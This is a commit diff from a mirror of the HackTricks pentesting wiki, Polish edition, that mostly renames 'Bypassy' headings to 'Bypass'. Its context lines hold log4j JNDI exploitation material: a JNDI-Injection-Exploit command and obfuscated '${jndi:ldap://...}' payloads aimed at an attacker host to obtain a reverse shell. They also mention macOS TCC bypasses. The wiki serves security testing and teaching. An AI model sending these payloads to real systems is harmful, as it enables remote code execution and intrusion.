mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
fix
This commit is contained in:
parent
930796caeb
commit
f4e5fa4061
@ -256,7 +256,7 @@ uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3
|
|||||||
|
|
||||||
Rozszerzony atrybut `com.apple.macl` **nie może być usunięty** jak inne rozszerzone atrybuty, ponieważ jest **chroniony przez SIP**. Jednak, jak [**wyjaśniono w tym poście**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/), możliwe jest jego wyłączenie **zipując** plik, **usuwając** go i **rozpakowując** go.
|
Rozszerzony atrybut `com.apple.macl` **nie może być usunięty** jak inne rozszerzone atrybuty, ponieważ jest **chroniony przez SIP**. Jednak, jak [**wyjaśniono w tym poście**](https://www.brunerd.com/blog/2020/01/07/track-and-tackle-com-apple-macl/), możliwe jest jego wyłączenie **zipując** plik, **usuwając** go i **rozpakowując** go.
|
||||||
|
|
||||||
## TCC Privesc & Bypassy
|
## TCC Privesc & Bypass
|
||||||
|
|
||||||
### Wstaw do TCC
|
### Wstaw do TCC
|
||||||
|
|
||||||
@ -554,10 +554,10 @@ AllowApplicationsList.plist:
|
|||||||
</dict>
|
</dict>
|
||||||
</plist>
|
</plist>
|
||||||
```
|
```
|
||||||
### TCC Bypassy
|
### TCC Bypass
|
||||||
|
|
||||||
{{#ref}}
|
{{#ref}}
|
||||||
macos-tcc-bypassy/
|
macos-tcc-bypasses/
|
||||||
{{#endref}}
|
{{#endref}}
|
||||||
|
|
||||||
## Odniesienia
|
## Odniesienia
|
||||||
|
|||||||
@ -1,4 +1,4 @@
|
|||||||
# macOS TCC Bypassy
|
# macOS TCC Bypass
|
||||||
|
|
||||||
{{#include ../../../../../banners/hacktricks-training.md}}
|
{{#include ../../../../../banners/hacktricks-training.md}}
|
||||||
|
|
||||||
|
|||||||
@ -1,4 +1,4 @@
|
|||||||
# 403 & 401 Bypassy
|
# 403 & 401 Bypass
|
||||||
|
|
||||||
{{#include ../../banners/hacktricks-training.md}}
|
{{#include ../../banners/hacktricks-training.md}}
|
||||||
|
|
||||||
|
|||||||
@ -311,7 +311,7 @@ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tm
|
|||||||
|
|
||||||
Teraz możesz łatwo użyć wygenerowanego linku JNDI, aby wykorzystać lukę i uzyskać **reverse shell**, wysyłając do podatnej wersji log4j: **`${ldap://10.10.14.10:1389/generated}`**
|
Teraz możesz łatwo użyć wygenerowanego linku JNDI, aby wykorzystać lukę i uzyskać **reverse shell**, wysyłając do podatnej wersji log4j: **`${ldap://10.10.14.10:1389/generated}`**
|
||||||
|
|
||||||
### Bypassy
|
### Bypass
|
||||||
```java
|
```java
|
||||||
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
|
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
|
||||||
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
|
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user